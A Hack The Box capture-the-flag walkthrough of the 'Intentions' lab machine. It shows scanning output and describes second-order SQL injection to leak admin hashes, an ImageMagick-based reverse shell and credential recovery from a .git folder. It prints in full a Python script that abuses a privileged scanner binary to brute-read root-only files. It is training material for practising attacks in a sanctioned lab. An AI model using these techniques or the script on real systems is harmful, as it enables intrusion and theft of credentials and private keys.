Hack The Box: Intentions Machine Walkthrough – Hard Difficulty

In this post, I would like to share a walkthrough of the Intentions Machine from Hack the Box

This room will be considered a Hard machine on Hack the Box

For those who want to learan or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me

Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259

What will you gain from the Intentions machine?

For the user flag, you will need to abuse the SQL Injection of the second order which will leak the admin hashes. The activity can be done with sqlmap or also enumerated with burpsuite. We are required to find the login version which in this case, it’s /api/v2 that has been configured in the web application. We should be able to modify images as Admin access which we will be using the ImageMagick trick which will lead to the abuse of arbitrary objects. As a result, we should retrieve a reverse shell in which we should be able to download the GIT file into our attacker’s machine and analyze the GIT file which leads to obtaining a credential.

As for the root flag, you only need to create a Python script which will provide us with file read vulnerability. We should be able to retrieve an SSH private key which we can read the root flag that way.

Information Gathering on Intentions Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

┌─[darknite@parrot]─[~/Documents/htb/intentions]
└──╼ $ nmap -sC -sV 10.129.18.117 -oA initial 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-04 02:04 EDT
Nmap scan report for 10.129.18.117
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 47d20066275ee69c808903b58f9e60e5 (ECDSA)
|_  256 c8d0ac8d299b87405f1bb0a41d538ff1 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Intentions
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds

Let’s access the website interface

We cannot login into the dashboard because we don’t have any credentials that we can use

Therefore, let’s register a new account

As a result, the account creation is complete.

Let’s access the dashboard with the credentials for an account that we created earlier.

Web Application Enumeration

At last, we managed to access the dashboard.

Our profile looks something like as above.

The screenshot above shows the feed of our account.

┌─[darknite@parrot]─[~/Documents/htb/intentions]
└──╼ $ gobuster dir -u http://10.10.11.220 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -x js 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.220
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              js
[+] Timeout:                 10s
===============================================================
2023/10/14 10:03:48 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 178] [--> http://10.10.11.220/js/]

When i scan the application with gobuster, i notice there’s a /js directory that we can dive deeper into it.

┌─[darknite@parrot]─[~/Documents/htb/intentions]
└──╼ $ gobuster dir -u http://10.10.11.220/js -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -x js 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.220/js
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              js
[+] Timeout:                 10s
===============================================================
2023/10/14 10:14:07 Starting gobuster in directory enumeration mode
===============================================================
/admin.js             (Status: 200) [Size: 311246]
/login.js             (Status: 200) [Size: 279176]
/app.js               (Status: 200) [Size: 433792]

I managed to find a few javascript files but one that caught my attention when i looked at the output was admin.js

I managed to clarify one message that was found inside the admin.js source code.

Hey team, I've deployed the v2 API to production and have started using it in the admin section. Let me know if you spot any bugs. This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text!  By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable. This should take care of the concerns raised by our users regarding our lack of HTTPS connection.

The v2 API also comes with some neat features we are testing that could allow users to apply cool effects to the images. I've included some examples on the image editing page, but feel free to browse all of the available effects for the module and suggest some :)

For a better visual, i copy-paste the statement into a block version so that everyone could read it together

SQL Injection attack

The screenshot above shows the original packet via burpsuite

On the feed packet, we managed to execute the SQL Injection attack on the application

We should save the packet of feed and genres on our attacker’s machine.

The payload will look something as shown above.

SQLmap enumeration

We managed to obtain the database information

Next, we also managed to retrieve the tables that were stored in the intentions database.

At last, we managed to obtain the hashes of two use

We tried login by using the email and hashes that were found earlier and managed to get a success status

When we replace the token in our browser, we should be able to access the /admin/ directory which looks like something as shown above.

The screenshot above shows all the images that have been saved on the website application

Let’s change the path location to something that we know very well such as /etc/passwd

As a result, we managed to obtain the output that we wanted so badly.

We managed to obtain useful information that we can take advantage of later.

Let’s create an image file so that we will be able to retrieve a reverse shell connection back to us.

We should be able to transfer the converted file to our victim’s machine

Boom! We managed to retrieve a reverse shell connection for us.

While roaming within the server, I found a .git folder that we should be looking deep into.

Sadly, we cannot investigate the git log inside the server itself.

Therefore, let’s zip the file and transfer it to our attacker’s machine.

We should be getting the file by using the wget command.

Let’s unzip the file as shown above.

The file inside the git folder looks like something as shown above.

There’s one git log that caught my attention

At last, we managed to find a potential username and password

Boom! We managed to change our www-data user to a greg username.

For easy usage, we will be accessing the machine via pwncat-cs tool

We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access

Let’s upload the linpeas script into our victim’s machine.

For a while, we managed to find a potential binary that we could use for further purposes.

For starter, we can read the manual of the scanner binary file

We also can read the file by using the less command

┌─[darknite@parrot]─[~/Documents/htb/intentions]
└──╼ $ cat test.py 
#!/usr/bin/env python3

import hashlib
import os
import string

file_to_brute = "/root/root.txt"
charset = string.printable
current_read = ""

def find_char(temp_hash):
    for i in charset:
        test_data = current_read + i
        current_hash = hashlib.md5(test_data.encode()).hexdigest()
        if temp_hash == current_hash:
            return i
    return None

def get_hash(i):
    temp_hash = os.popen(f"/opt/scanner/scanner -c {file_to_brute} -s 5d41402abc4b2a76b9719d911017c592 -p -l {i}").read().split(" ")[-1].rstrip()
    return temp_hash

i = 1
while True:
    temp_hash = get_hash(i)
    new_char = find_char(temp_hash)
    if not new_char:
        break
    else:
        current_read += new_char
        i += 1
print(current_read)

We can use the Python script above to obtain the root flag

Let’s use the Python script to read the root flag

Aside from getting the flag by using the Python script, we also should be able to obtain the SSH private key by altering the source code a little bit for that purpose.